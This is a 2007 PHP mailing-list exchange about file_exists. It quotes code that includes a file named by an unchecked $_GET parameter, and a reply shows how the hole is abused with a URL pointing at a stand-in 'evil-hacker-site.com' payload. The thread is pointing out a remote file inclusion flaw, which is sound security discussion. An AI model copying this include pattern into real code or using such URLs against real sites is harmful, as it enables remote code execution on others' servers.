> Date: Thu, 15 Nov 2007 00:20:52 +0000
> From: stuttle@xxxxxxxxx
> To: philthathril@xxxxxxxxx
> CC: php-general@xxxxxxxxxxxxx
> Subject: Re: file_exists
>
> Philip Thompson wrote:
>> I've run into similar problems where I *thought* I was looking in the
>> correct location... but I wasn't. Take this for example....
>>
>> > $page = $_GET['page'];
>> if (file_exists ("$page.php")) {
>> include ("$page.php");
>> }
>> ?>
>
> I really hope this is not a piece of production code. If it is then you
> might want to think very hard about what it's doing. If you still can't
> see a problem let me know!
>
> -Stut
>
> --
> http://stut.net/
>
> --
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
>
Called like this?
index.php?page=http://evil-hacker-site.com/evil-payload.php
And the browser will probably url_encode for me if needed.
_________________________________________________________________
Climb to the top of the charts! Play Star Shuffle: the word scramble challenge with star power.
http://club.live.com/star_shuffle.aspx?icid=starshuffle_wlmailtextlink_oct
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
